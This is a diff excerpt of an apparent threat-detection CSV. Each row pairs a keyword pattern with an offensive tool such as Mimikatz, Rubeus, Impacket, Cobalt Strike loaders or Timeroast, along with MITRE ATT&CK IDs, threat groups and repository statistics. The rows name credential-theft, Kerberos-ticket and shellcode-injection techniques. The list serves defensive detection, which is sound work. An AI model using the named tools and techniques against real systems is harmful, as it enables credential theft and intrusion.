security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*thycotic_secretserver_dump.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*tiagorlampert*","offensive_tool_keyword","Github Username","github repo username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/tiagorlampert","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ticket.kirbi*","offensive_tool_keyword","mimikatz","Mimikatz Unconstrained delegation. 
With administrative privileges on a server with Unconstrained Delegation set we can dump the TGTs for other users that have a connection. If we do this successfully. we can impersonate the victim user towards any service in the domain.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*ticket.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*ticket.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "*ticketConverter.py *.ccache *","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*ticketConverter.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*ticketConverter.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*ticketer.py -nthash*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*ticketer.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*ticketer.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*ticketsplease adfs *","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*ticketsplease azure *","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*ticketsplease dcsync *","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential 
Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" 
@@ -17705,8 +17889,8 @@ "*ticketsplease ticket --domain*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*ticketsplease.modules.*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*TicketToHashcat.py*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" -"*TicketToHashcat.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*Tiger-192.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*TicketToHashcat.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*Tiger-192.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*tijme/kernel-mii*","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 
T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","72","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" "*TikiLoader*Hollower*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*TikiLoader.*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" 
@@ -17725,13 +17909,13 @@ "*TikiSpawnWppid*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*TikiTorch.exe*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. 
Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*TikiVader.*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" -"*timemachine_cmd_injection*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*timemachine_cmd_injection*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*timeroast.ps1*","offensive_tool_keyword","Timeroast","Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID","T1558.003 - T1059.003 - T1078.004","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/SecuraBV/Timeroast","1","1","N/A","10","2","152","16","2023-07-04T07:12:57Z","2023-01-18T09:04:05Z" "*timeroast.py*","offensive_tool_keyword","Timeroast","Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID","T1558.003 - T1059.003 - T1078.004","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/SecuraBV/Timeroast","1","1","N/A","10","2","152","16","2023-07-04T07:12:57Z","2023-01-18T09:04:05Z" -"*timestomp c:*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*timestomp c:*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*timing_attack * --brute-force*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*timwhitez/Doge-Loader*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","10","10","277","61","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z" -"*TlRMTVNTUAABAAAABYIIAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAAAAAAAwAAAA*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","ntlm decoder","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*TlRMTVNTUAABAAAABYIIAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAAAAAAAwAAAA*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","ntlm decoder","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" "*TlRMTVNTUAABAAAAMpCI4gAAAAAoAAAAAAAAACgAAAAGAbEdAAAADw==*","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","0","N/A","8","1","32","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" "*TlRMTVNTUAACAAAABgAGADgAAAAFAomih5Y9EpIdLmMAAAAAAAAAAIAAgAA*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. 
Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*tls-scanner -connect *:*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" 
